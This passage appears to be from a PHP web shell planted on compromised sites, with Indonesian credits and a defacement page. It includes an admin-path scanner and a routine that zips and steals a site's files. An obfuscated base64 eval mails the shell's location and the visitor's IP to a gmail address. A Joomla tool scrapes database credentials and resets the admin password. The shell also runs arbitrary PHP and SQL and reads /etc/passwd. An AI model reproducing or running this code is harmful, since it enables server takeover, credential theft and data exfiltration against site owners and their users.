- }
- // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- template();
- if(!isset($_POST['xploit_url'])) die;
- if($_POST['xploit_url'] == '') die;
- $site = $_POST['xploit_url'];
- if ($site[strlen($site)-1] != "/") $site .= "/";
- if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
- $list['end'] = str_replace("\r", "", $list['end']);
- $list['front'] = str_replace("\r", "", $list['front']);
- $pathes = explode("\n", $list['end']);
- $frontpathes = explode("\n", $list['front']);
- show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
- $verificate = 0;
- foreach($pathes as $path) {
- show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
- $verificate++; show($verificate, 0, 0, 'verified', 1);
- if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
- else{
- show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
- show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
- }
- }
- preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
- if(substr($site, 0, 3) == "www") $site = substr($site, 4);
- foreach($frontpathes as $frontpath) {
- show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
- $verificate++; show($verificate, 0, 0, 'verified', 1);
- if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
- else{
- show('<span style="color: #FF0000;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
- show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
- }
- }
- }
- ?>
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'maling')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=maling" method="post">
- <form method="post" action="" enctype="multipart/form-data">
- <input type=text name=sites size=40></nobr><br>
- <input type="submit" name="go" value="Colong!" style="margin: 5px auto; hight: 25px; width: 100px;">
- </form>
- <?php
- $site = explode("\r\n", $_POST['sites']);
- $go = $_POST['go'];
- if($go) {
- foreach($site as $sites) {
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- $folder="$sites";
- $output="hasil-maling.zip";
- $zip = new ZipArchive();
- if ($zip->open($output, ZIPARCHIVE::CREATE) !== TRUE) {
- die ("Unable to open Archirve");
- }
- $all= new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
- foreach ($all as $f=>$value) {
- $zip->addFile(realpath($f), $f) or die ("ERROR: Unable to add file: $f");
- }
- $zip->close();
- echo "Selamat Anda Berhasil Mencuri Data Website ";
- }
- }
- }
- ?>
- <?php
- $n0b="QGluaV9zZXQoJ291dHB1dF9idWZmZXJpbmcnLCAwKTsNCkBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQpoZWFkZXIoJ0NvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04Jyk7DQokbjBiPSAneWFtYWFwOTJAZ21haWwuY29tJzsNCiR4X3BhdGggPSAiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KJHBlc2FuX2FsZXJ0ID0gImZpeCAkeF9wYXRoIDpwICpJUCBBZGRyZXNzIDogWyAiIC4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gLiAiIF0iOw0KbWFpbCgkbjBiLCAiTWFobyIsICRwZXNhbl9hbGVydCwgIlsgIiAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gIiBdIik7";
- eval(base64_decode($n0b));
- ?>
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'about'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
- <html lang="en">
- <head>
- <meta charset="utf-8" />
- <TITLE>whoami?</TITLE>
- <META NAME="description" CONTENT="AsuKabeh"/>
- <META NAME="keywords" CONTENT="shamp0erna99"/>
- <META NAME="copyright" CONTENT="Copyright . All Rights Reserved."/>
- <META NAME="author" CONTENT="shmprn99"/>
- <meta NAME="robots" CONTENT="index,follow"/>
- <META NAME="language" CONTENT="En">
- <META NAME="revisit-after" CONTENT="1"/>
- <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'/>
- </head>
- <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
- <body>
- <style type="text/css">
- body {
- background-color: black;
- }
- .sok {
- margin-top: 20%;
- }
- </style>
- <div class="sok"><b><font size="20" face="Iceland"><center><SCRIPT>
- farbbibliothek = new Array();
- farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
- farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
- farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
- farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
- farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
- farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[6] = new Array("#0000FF","#FFFF00");
- farben = farbbibliothek[4];
- function farbschrift()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.all["a"+i].style.color=farben[i];
- }
- farbverlauf();
- }
- function string2array(text)
- {
- Buchstabe = new Array();
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- k=0;
- while(k<=text.length)
- {
- Buchstabe[k] = text.charAt(k);
- k++;
- }
- }
- function divserzeugen()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
- }
- farbschrift();
- }
- var a=1;
- function farbverlauf()
- {
- for(var i=0 ; i<farben.length; i++)
- {
- farben[i-1]=farben[i];
- }
- farben[farben.length-1]=farben[-1];
- setTimeout("farbschrift()",20);
- }
- //
- var farbsatz=1;
- function farbtauscher()
- {
- farben = farbbibliothek[farbsatz];
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
- }
- setInterval("farbtauscher()",2000);
- text= "Pwndzx by shamp0erna99"; //h
- string2array(text);
- divserzeugen();
- //document.write(text);
- </SCRIPT></center></font></b></div>
- <center>
- <br><font color="red">Not only are black people protected and supported but all</font><font color="white"> religious people throughout the world are obliged to protect one another. Do you understand that?
- <br><font color="red">#Indonesian</font><font color="white"> Hacker Rulez @2020</font><br>
- ============================<br>JakselWorld<a href="https://local-hunter.com/">.</a></center>
- <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/19171558&auto_play=true"></iframe>
- <script type='text/javascript'>
- //<![CDATA[
- shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://translate.google.co.id/?hl=id#view=home&op=translate&sl=auto&tl=id&text=MAU%20NGAPAIN%20COK%20%3F"});
- //]]>
- </script>
- </body>
- </html>
- <?php
- }
- //////////////////////////////////////////////////////////////////////////////
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'jomla')) {
- ?>
- <form action="?&jak=jomla" method="post">
- <?php
- error_reporting(0);
- if($_POST){
- function jipukteks($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function anucurl($sites){
- $ch1 = curl_init ("$sites");
- curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
- $data = curl_exec ($ch1);
- return $data;
- }
- function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
- $post2 = array(
- "username" => "$fak1",
- "passwd" => "$fak2",
- "lang" => "en-GB",
- "option" => "com_login",
- "task" => "login",
- "return" => "$fak3",
- "$fak4" => "1",
- );
- $ch = curl_init ("$cek");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data6 = curl_exec ($ch);
- return $data6;
- }
- $link = $_POST['link'];
- if($link==""){
- echo "Report: <br>";
- echo "-> Link Config anda belum terisi <-";
- }
- else{
- $file = anucurl($link);
- $host = jipukteks($file,"smtphost = '","'");
- $username = jipukteks($file,"user = '","'");
- $password = jipukteks($file,"password = '","'");
- $db = jipukteks($file,"db = '","'");
- $dbprefix = jipukteks($file,"dbprefix = '","'");
- $user_baru = "admin";
- $password_baru = "kefiex";
- $prefix = $dbprefix."users";
- $pass = md5("$password_baru");
- $serah = $db.".".$dbprefix;
- echo "<font color='#C6C646'>Database Content :</font><br>";
- echo "Db Host          : <font color='green'>$host</font><br>";
- echo "Db user           : <font color='green'>$username</font><br>";
- echo "Db Password  : <font color='green'>$password</font><br>";
- echo "Db name         : <font color='green'>$db</font><br>";
- echo "Table_Prefix   : <font color='green'>$dbprefix</font><br>";
- mysql_connect($host,$username,$password) or die("<br><font color='red'>Gagal Terkoneksi Ke Database ...</font>");
- mysql_select_db($db) or die("<font color='red'>Database tidak bisa dibuka ...</font>");
- $show=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $r=mysql_fetch_array($show);
- $id = $r[id];
- mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
- $utama = "$link";
- $kedua = @file_get_contents($utama);
- if(preg_match("askdasldasdlja12123",$kedua)){
- echo "# <font color='green'>berhasil rubah password</font><br>";
- echo "# $utama<br>";
- }
- else{
- echo "<br># <font color='green'>Pasword berhasil dirubah: </font><br>";
- echo "Username: <font color='#C6C646'>$user_baru</font><br>";
- echo "Password: <font color='#C6C646'>$password_baru</font><br>";
- }
- }
- }else{
- echo '<html>
- <body>
- <center>
- <center><br><span style="font-size:1.6em;"> .: Joomla Password Reset | Tools :. </span><br>Coded by Bl4ckcod37</center><br>
- <table>
- <tr><td><form method="post"></td></tr>
- <tr><td><input class="inputz" size=50 type="text" name="link" placeholder="masukkan link config disini"></td></tr>
- <tr><td>                                                 <input
- class="inputz" type="submit" value="Reset"></td></tr>
- </form>
- </table><br>
- <a href="https://local-hunter.com/">Copyright All Reserved.</a>
- </center>
- </body>
- </html><br><br><br><br>';
- }
- }
- ?>
- </div></div></div></div></div></div>
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=php" method="post">
- <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
- else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
- <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
- if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
- $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
- if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
- $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db']))
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
- if(isset($_GET['table'])) $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
- $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
- $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
- $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
- $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
- $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
- foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
- elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
- $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
- $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
- if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
- for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
- if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
- if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
- $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
- <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
- <input type="hidden" name="x" value="mysql" />
- <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
- <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
- <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
- <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
- <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
- <?php }}
- elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
- elseif(isset($_GET['jak']) && ($_GET['jak'] == 'jump')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
- elseif(isset($_GET['jak']) && ($_GET['jak'] == 'ese')){ @eval(gzinflate(base64_decode($ekse))); "</div>"; }
- elseif(isset($_GET['jak']) && ($_GET['jak'] == 'wpp')){ @eval(gzinflate(base64_decode($wpress))); "</div>"; }
- elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr> </table> ";
